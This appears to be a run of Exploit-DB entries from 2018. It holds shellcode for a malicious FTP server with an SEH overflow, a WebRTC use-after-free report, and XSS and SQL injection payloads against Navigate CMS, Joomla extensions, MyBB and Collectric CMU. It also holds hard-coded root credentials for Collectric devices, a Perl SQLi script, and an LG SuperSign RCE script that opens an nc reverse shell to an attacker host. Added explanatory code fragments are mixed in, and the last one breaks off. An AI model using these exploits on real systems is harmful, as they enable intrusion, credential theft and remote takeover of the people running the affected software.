buf += "\x2d\x9b\x1a\x01\x6a\xcf\xf2\x54\x24\xb9\xb4\x0e\x86"
buf += "\x13\x6f\xfc\x40\xf3\xf6\xce\x52\x85\xf6\x1a\x25\x69"
buf += "\x46\xf3\x70\x96\x67\x93\x74\xef\x95\x03\x7a\x3a\x1e"
buf += "\x33\x31\x66\x37\xdc\x9c\xf3\x05\x81\x1e\x2e\x49\xbc"
buf += "\x9c\xda\x32\x3b\xbc\xaf\x37\x07\x7a\x5c\x4a\x18\xef"
buf += "\x62\xf9\x19\x3a"

nseh="\xEB\x80\x90\x90" # JMP BACK 128 bytes
seh="\x84\x12\x40\x00" #POP-POP-RETN null byte is trivial 
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
egg = "\x54\x30\x30\x57" #W00T

junk = "\x90" * (2160-len(buf)-len(egghunter)) + egg + egg + buf +"\x90" * 100 + egghunter   + "\x90" * 7 + "\xEB\x80\x90\x90" +"\x84\x12\x40\x00" #junk total 2283 bytes

buffer =junk

while True:
    conn, addr = s.accept()
    conn.send('220 Malicious FTP server!\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('230 OK\r\n')
    print(conn.recv(1024))
    conn.send('220 "'+buffer+'" is current directory\r\n')
            
There is a use-after-free in VP9 processing in WebRTC. In the method RtpFrameReferenceFinder::ManageFrameVp9 the following code occurs:

  auto gof_info_it = gof_info_.find((codec_header.temporal_idx == 0)
                                        ? codec_header.tl0_pic_idx - 1
                                        : codec_header.tl0_pic_idx);

  ... // snip

    info = &gof_info_it->second;
  }

  // Clean up info for base layers that are too old.
  uint8_t old_tl0_pic_idx = codec_header.tl0_pic_idx - kMaxGofSaved;
  auto clean_gof_info_to = gof_info_.lower_bound(old_tl0_pic_idx);
  gof_info_.erase(gof_info_.begin(), clean_gof_info_to);

  FrameReceivedVp9(frame->id.picture_id, info);

tl0_pic_idx is extracted from the incoming packet, and if it is higher than any picture id that exists in gof_info_, every entry in gof_info_ will be erased, and info will be used in the call to FrameReceivedVp9 even though the entry it points to has been freed.
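The ordering problem above, as an added example that is not WebRTC's code: a reduced model with a plain std::map<uint8_t, GofInfo> (the real container type, its comparator and the value of kMaxGofSaved are assumptions, not taken from the page). WouldDangle() keeps the snippet's order of operations but replaces the final dereference with a membership check, and HandleFrameSafe() shows one safe ordering, pruning before the lookup so no pointer outlives the entry it refers to.

```cpp
// Added example, not WebRTC's code: a reduced model of the lookup / prune /
// use sequence in the ManageFrameVp9 snippet above. Names are hypothetical.
#include <cstddef>
#include <cstdint>
#include <initializer_list>
#include <map>
#include <string>

namespace vp9_model {

constexpr int kMaxGofSaved = 50;  // assumed value; the snippet uses only the name

struct GofInfo {
  std::string label;  // stands in for the real group-of-frames data
};

struct Vp9Header {
  uint8_t temporal_idx;
  uint8_t tl0_pic_idx;
};

struct FrameResult {
  bool processed;     // false: frame dropped because its GofInfo was pruned
  std::string label;  // the GofInfo that FrameReceivedVp9 would have used
};

class Finder {
 public:
  // Constructed fixture: one GofInfo per tl0_pic_idx key.
  explicit Finder(std::initializer_list<uint8_t> keys) {
    for (uint8_t k : keys) gof_info_[k] = GofInfo{"gof-" + std::to_string(k)};
  }

  // The key ManageFrameVp9 looks up, as in the snippet above.
  static uint8_t LookupKey(const Vp9Header& h) {
    return h.temporal_idx == 0 ? static_cast<uint8_t>(h.tl0_pic_idx - 1)
                               : h.tl0_pic_idx;
  }

  // The cleanup from the snippet: erase every entry below
  // tl0_pic_idx - kMaxGofSaved. The subtraction lands in a uint8_t, so for
  // tl0_pic_idx < kMaxGofSaved it wraps to a large value, lower_bound()
  // returns end(), and the whole map is erased.
  void PruneOld(uint8_t tl0_pic_idx) {
    uint8_t old_tl0_pic_idx = static_cast<uint8_t>(tl0_pic_idx - kMaxGofSaved);
    gof_info_.erase(gof_info_.begin(), gof_info_.lower_bound(old_tl0_pic_idx));
  }

  // Vulnerable ordering: look up, take a pointer, prune, use the pointer.
  // The final dereference is replaced by a membership check so this stays
  // defined behaviour; true means `info` would now point into freed memory.
  bool WouldDangle(const Vp9Header& h) {
    auto it = gof_info_.find(LookupKey(h));
    if (it == gof_info_.end()) return false;  // snipped path: no pointer taken
    const uint8_t key = it->first;            // the node `info` refers to
    PruneOld(h.tl0_pic_idx);                  // may free that node
    return gof_info_.find(key) == gof_info_.end();
  }

  // One safe ordering: prune before looking up, so any pointer taken refers
  // to a node that survives until it is used. A frame whose entry was pruned
  // is dropped instead of being processed through a dangling pointer.
  FrameResult HandleFrameSafe(const Vp9Header& h) {
    PruneOld(h.tl0_pic_idx);
    auto it = gof_info_.find(LookupKey(h));
    if (it == gof_info_.end()) return {false, ""};
    GofInfo* info = &it->second;
    return {true, info->label};  // stands in for FrameReceivedVp9(picture_id, info)
  }

  size_t size() const { return gof_info_.size(); }

 private:
  std::map<uint8_t, GofInfo> gof_info_;  // assumed plain ascending map
};

}  // namespace vp9_model
```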

ASAN output:

==163231==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060000031d0 at pc 0x0000014b0e1e bp 0x7ffe607dfd30 sp 0x7ffe607dfd28
READ of size 2 at 0x6060000031d0 thread T0
    #0 0x14b0e1d in webrtc::video_coding::RtpFrameReferenceFinder::FrameReceivedVp9(unsigned short, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo*) modules/video_coding/rtp_frame_reference_finder.cc:569:31
    #1 0x14ac2c5 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:499:3
    #2 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14
    #3 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43
    #4 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22
    #5 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31
    #6 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19
    #7 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
    #8 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42
    #9 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20
    #10 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3
    #11 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35
    #12 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23
    #13 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5
    #14 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3
    #15 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
    #16 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
    #17 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36
    #18 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10
    #19 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31
    #20 0x62337d in main video/replay.cc:343:3
    #21 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)

0x6060000031d0 is located 48 bytes inside of 56-byte region [0x6060000031a0,0x6060000031d8)
freed by thread T0 here:
    #0 0x61bbb2 in operator delete(void*) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:150:3
    #1 0x14ac26c in __libcpp_deallocate buildtools/third_party/libc++/trunk/include/new:279:10
    #2 0x14ac26c in deallocate buildtools/third_party/libc++/trunk/include/memory:1802
    #3 0x14ac26c in deallocate buildtools/third_party/libc++/trunk/include/memory:1556
    #4 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/__tree:2370
    #5 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/__tree:2379
    #6 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/map:1200
    #7 0x14ac26c in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:497
    #8 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14
    #9 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43
    #10 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22
    #11 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31
    #12 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19
    #13 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
    #14 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42
    #15 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20
    #16 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3
    #17 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35
    #18 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23
    #19 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5
    #20 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3
    #21 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
    #22 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
    #23 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36
    #24 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10
    #25 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31
    #26 0x62337d in main video/replay.cc:343:3
    #27 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)

previously allocated by thread T0 here:
    #0 0x61af72 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3
    #1 0x14b664f in __libcpp_allocate buildtools/third_party/libc++/trunk/include/new:259:10
    #2 0x14b664f in allocate buildtools/third_party/libc++/trunk/include/memory:1799
    #3 0x14b664f in allocate buildtools/third_party/libc++/trunk/include/memory:1548
    #4 0x14b664f in __construct_node<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/__tree:2191
    #5 0x14b664f in std::__1::pair<std::__1::__tree_iterator<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, std::__1::__tree_node<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, void*>*, long>, bool> std::__1::__tree<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, std::__1::__map_value_compare<unsigned char, std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, webrtc::DescendingSeqNumComp<unsigned char, (unsigned char)0>, true>, std::__1::allocator<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> > >::__emplace_unique_impl<short const&, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>(short const&, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo&&) buildtools/third_party/libc++/trunk/include/__tree:2203
    #6 0x14ab9ca in __emplace_unique<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/__tree:1193:16
    #7 0x14ab9ca in emplace<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/map:1041
    #8 0x14ab9ca in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:445
    #9 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14
    #10 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43
    #11 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22
    #12 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31
    #13 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19
    #14 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
    #15 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42
    #16 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20
    #17 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3
    #18 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35
    #19 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23
    #20 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5
    #21 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3
    #22 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
    #23 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
    #24 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36
    #25 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10
    #26 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31
    #27 0x62337d in main video/replay.cc:343:3
    #28 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)

SUMMARY: AddressSanitizer: heap-use-after-free modules/video_coding/rtp_frame_reference_finder.cc:569:31 in webrtc::video_coding::RtpFrameReferenceFinder::FrameReceivedVp9(unsigned short, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo*)
Shadow bytes around the buggy address:
  0x0c0c7fff85e0: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd
  0x0c0c7fff85f0: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c7fff8600: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c7fff8610: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c7fff8620: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fa
=>0x0c0c7fff8630: fa fa fa fa fd fd fd fd fd fd[fd]fa fa fa fa fa
  0x0c0c7fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff8670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff8680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==163231==ABORTING

To reproduce the issue:

1) apply new.patch to your webrtc directory
2) build video_replay
3) download the attached file into the same directory
4) run ./video_replay --input_file uaf


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45443.zip
            
# Title: Navigate CMS 2.8 - Cross-Site Scripting 
# Author: Felipe "Renzi" Gabriel
# Date: 2018-09-19
# Vendor: https://www.navigatecms.com/en/home
# Software: Navigate CMS 2.8
# CVE: CVE-2018-17255

# Technical Details & Description:
# A Reflected Cross-Site Scripting vulnerability has been discovered in the "Navigate CMS" web application.
# The vulnerability is located in the 'fid' parameter of a GET request to `navigate.php`.
  
# PoC
  
http://Target/navigate/navigate.php?fid=files"><marquee>RENZI</marquee>
            
# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection
# Google Dork: "Inloggning Collectric CMU"
# Discoverer: Simon Brannstrom
# Date: 2018-09-15
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# CVE: N/A
# About: Collectric CMU is a Swedish-made controller device for electrical devices such as car heaters, 
# camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface. 
# More vulnerabilities exist; see my other vulnerability reports.

# Parameter: lang (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause

Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind

Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in


# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
# Discoverer: Simon Brannstrom
# Date: 09/15/2018
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: Collectric CMU is a Swedish-made controller device for electrical devices such as car heaters, camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface.
# More vulnerabilities exist; see my other vulnerability reports.

---
Web Portal hard-coded credentials:
username: sysadmin
password: zoogin

SSH user/root credentials:
username: kplc
password: kplc

username: root
password: zoogin

*The SSH server is running Dropbear sshd 0.52 (protocol 2.0) which requires diffie-hellman-group1-sha1.

MySQL root credentials:
username: root
password: sql4u
---
            
# Exploit Title: Joomla! CW Article Attachments 1.0.6 - 'id' SQL Injection
# Date: 2018-09-20
# Exploit Author: Haboob Team
# Software Link: https://extensions.joomla.org/extension/cw-article-attachments/
# Version: < 1.0.6
# CVE : CVE-2018-14592 
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14592

# 1. Description
# The CWJoomla CW Article Attachments PRO extension before 2.0.7 and CW Article Attachments 
# FREE extension before 1.0.6 for Joomla! allow SQL Injection within download.php.
 
# 2. Proof of Concept
 
http://IP-ADDRESS/plugins/content/cwattachments/cwattachments/helpers/download.php?id=INJECTION&sid=0123456789987654321
            
# Title: MyBB Visual Editor 1.8.18 - Cross-Site Scripting
# Author: Numan OZDEMIR
# Vendor Homepage: mybb.com
# Software Link: https://mybb.com/download/
# Version: Up to v1.8.18. Fixed in v1.8.19.
# PoC Video: https://numanozdemir.com/mybb/xss.mp4
# CVE: CVE-2018-17128

# Description:
# An attacker can run JavaScript in a victim user's browser while the victim is replying to a post.
# The 'videotype' section of the video BBCode tag is the cause.

# How to Reproduce:

1) Go to the thread posting page (newthread.php) and enter a title and content.
2) Click the "Insert a video" command. Select any source and insert any URL.
3) Edit the video source with your payload.
Or, directly add this code:

[video=PAYLOAD]http://victim.com[/video]
Example:
[video=PA<svg/onload=alert('xss')>YLOAD]http://victim.com[/video]

4) Post the thread.

# While the victim user is replying to your post, their browser will run the JavaScript.
# Vulnerable pages: editpost.php, newreply.php, private.php
# and all Visual Editor embedded pages.
            
# Exploit Title: LG SuperSign EZ CMS 2.5 - Remote Code Execution
# Date: 2018-09-18
# Exploit Author: Alejandro Fanjul
# Vendor Homepage: https://www.lg.com
# Software Link: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSignEZ 1.3
# Tested on: LG WebOS 3.10
# CVE : CVE-2018-17173

# 1. Description
# LG SuperSignEZ CMS, which many LG SuperSign TVs have built in, is prone
# to remote code execution due to improper parameter handling.

# 2. Proof of concept
# Code to exploit the vulnerability

import requests
from argparse import ArgumentParser

parser = ArgumentParser(description="SuperSign RCE")
parser.add_argument("-t", "--target", dest="target",
                        help="Target")
parser.add_argument("-l", "--lhost", dest="lhost",
                        help="lhost")
parser.add_argument("-p", "--lport", dest="lport",
                        help="lport")

args = parser.parse_args()

#LG SuperSignEZ always runs on port 9080, so for the target you must type: LG_SuperSign_IP:9080
#Example
#supersign-exploit.py -t LG_SuperSign_IP:9080 -l attacker_ip -p 4444
#On the attacker machine, wait for the shell with nc -lvp 4444
#enjoy your shell

s = requests.get('http://' + str(args.target).replace('\n', '') + '/qsr_server/device/getThumbnail?sourceUri=\'%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20'+str(args.lhost)+'%20'+str(args.lport)+'%20%3E%2Ftmp%2Ff;\'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150')
            
# Exploit Title: Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-09-18
# Vendor Homepage: http://arenam.ru/
# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/amgallery/
# Version: 1.2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #

# # # # #
# POC: 
# 
# 1)
# # # # #

#!/usr/bin/perl -w
# # # # #

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "
################################################################################
        ______  _______ ___    _   __   _____ _______   ___________    _   __ 
       /  _/ / / / ___//   |  / | / /  / ___// ____/ | / / ____/   |  / | / / 
       / // /_/ /\__ \/ /| | /  |/ /   \__ \/ __/ /  |/ / /   / /| | /  |/ /
     _/ // __  /___/ / ___ |/ /|  /   ___/ / /___/ /|  / /___/ ___ |/ /|  /
    /___/_/ /_//____/_/  |_/_/ |_/   /____/_____/_/ |_/\____/_/  |_/_/ |_/
                                       
                                       +                                     
                Joomla! Component AMGallery 1.2.3 - SQL Injection          
################################################################################
";

use LWP::UserAgent;
print "\nTarget:[http://site.com/path/]: "; 
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress.....\n";
print "\n";
$efe="%2d%36%36%36%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%23";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0');
$host = $target . "?filter_category_id=".$efe."";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/<h2 class="amGalleryCatTitle">(.*?)<\/h2>/){ 
print "[+] Success !!!\n";
print "\n[+] Detail : $1\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
            
# Exploit: udisks2 2.8.0 - Denial of Service (PoC)
# Author: oxagast
# Date: 2018-09-22
# Vendor Homepage: http://storaged.org/
# Software Link: https://github.com/storaged-project/udisks
# Version: <=udisks2 2.8.0
# Tested on: Ubuntu x64
    __ _  _  __   ___  __  ____ ____ 
  /  ( \/ )/ _\ / __)/ _\/ ___(_  _)
 (  O )  (/    ( (_ /    \___ \ )(  
  \__(_/\_\_/\_/\___\_/\_(____/(__)

# ========The vulnerable section of code is:========
#if GLIB_CHECK_VERSION(2, 50, 0)
  g_log_structured ("udisks", (GLogLevelFlags) level,
        "MESSAGE", message, "THREAD_ID", "%d", (gint) syscall (SYS_gettid),
        "CODE_FUNC", function, "CODE_FILE", location);
#else
  g_log ("udisks", level, "[%d]: %s [%s, %s()]", (gint) syscall (SYS_gettid), message, location, function);
#endif

# =================Short Whitepaper=================
# The vulnerability can be triggered by using one computer to create a filesystem on a USB key 
# (or other removable media), then editing its filesystem label to include a bunch of %n's, and removing and 
# inserting the media into another computer running udisks2 <=2.8.0.  This binary runs as root, and if 
# exploited in that capacity could potentially allow full compromise.  This will cause a denial of service, 
# crashing udisks2 and not letting it restart (until /var/lib/udisks2/mounted-fs is 
# removed and the system is restarted).  This keeps the system from automounting things like USB drives and CDs.
# The vulnerability -may- be exploitable beyond a DoS by crafting a format string exploit and putting it
# in the label of the drive.  I tried to exploit it for a couple of days, but could not find a filesystem with a
# long enough label to fit the exploit and spawn a root shell, as the smallest shellcode I
# could make was around 50 characters, and the longest filesystem labels I could find are limited to 32 characters.
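The logging mistake described above, as an added example that is not code from the advisory or from udisks: the quoted pattern rewritten so the untrusted label is always a `%s` argument and never the format, next to a small scanner that counts format directives in a label. `count_format_directives`, `log_mount_event` and `label_logged_literally` are hypothetical names standing in for the GLib calls.

```c
#include <stdio.h>
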